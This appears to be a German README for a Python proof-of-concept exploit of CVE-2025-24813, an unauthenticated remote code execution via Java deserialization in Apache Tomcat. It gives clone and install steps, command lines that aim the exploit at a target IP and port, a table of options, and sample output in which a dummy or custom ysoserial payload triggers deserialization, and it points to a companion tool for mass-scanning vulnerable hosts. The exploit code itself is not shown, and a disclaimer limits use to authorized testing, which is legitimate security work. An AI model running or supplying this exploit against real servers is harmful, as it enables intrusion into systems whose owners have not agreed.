
Ein Python Proof-of-Concept-Exploit für CVE-2025-24813 - Nicht authentifizierte RCE in Apache Tomcat (v9.0.0-9.0.98/10.1.0-10.1.34/11.0.0-11.0.2) durch bösartige Deserialisierung von Java-Objekten. Beinhaltet einen sicheren Erkennungsmodus und Unterstützung für benutzerdefinierte Payloads.
Ein Proof-of-Concept-Exploit für die Deserialisierungsschwachstelle in Apache Tomcat (CVE-2025-24813). Dieses Tool zeigt, wie Angreifer unsichere Deserialisierung in der Sitzungsverwaltung von Tomcat ausnutzen könnten.
WARNUNG: Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Die unbefugte Nutzung gegen Systeme, die Ihnen nicht gehören, ist illegal.
requestscoloramagit clone https://github.com/mattb709/CVE-2025-24813-PoC.git
cd CVE-2025-24813-PoC
pip install -r requirements.txt
Einfache Nutzung:
python CVE-2025-24813-PoC.py -t 192.168.1.100 -p 8080
Erweiterte Optionen:
python CVE-2025-24813-PoC.py \
-t 10.0.0.1 \
-p 8443 \
--protocol https \
--no-verify \
--timeout 15
| Argument | Beschreibung | Erforderlich |
|---|---|---|
-t, --target | Ziel-IP-Adresse | Ja |
-p, --port | Zielportnummer | Ja |
--protocol | http oder https (Standard: http) | Nein |
--no-verify | SSL-Zertifikatsprüfung deaktivieren | Nein |
--timeout | Timeout für Anfragen in Sekunden (Standard: 10) | Nein |
[*] Apache Tomcat CVE-2025-24813 Exploit PoC
[!] WARNING: For authorized testing only. Unauthorized use is illegal.
[*] Targeting http://192.168.1.100:8080
[*] Payload Options:
1. Use default dummy payload (safe, for detection)
2. Enter custom payload (hex-encoded, e.g., from ysoserial)
[?] Enter choice (1 or 2): 1
[*] Using default dummy payload.
[*] Attempting exploit...
[+] Success: Deserialization triggered (HTTP 500). Potential RCE if payload is malicious!
Für das Massenscannen von anfälligen Systemen:
🔍 CVE-2025-24813-Scanner – Tool zur Massenerkennung anfälliger Tomcat-Hosts
Wenn Sie von dieser Schwachstelle betroffen sind:
Diese Software wird unter der MIT-Lizenz bereitgestellt. Der Autor ist nicht verantwortlich für die missbräuchliche Verwendung dieses Tools. Holen Sie stets die entsprechende Genehmigung ein, bevor Sie Systeme testen.
MIT-Lizenz – Siehe LICENSE-Datei für Details.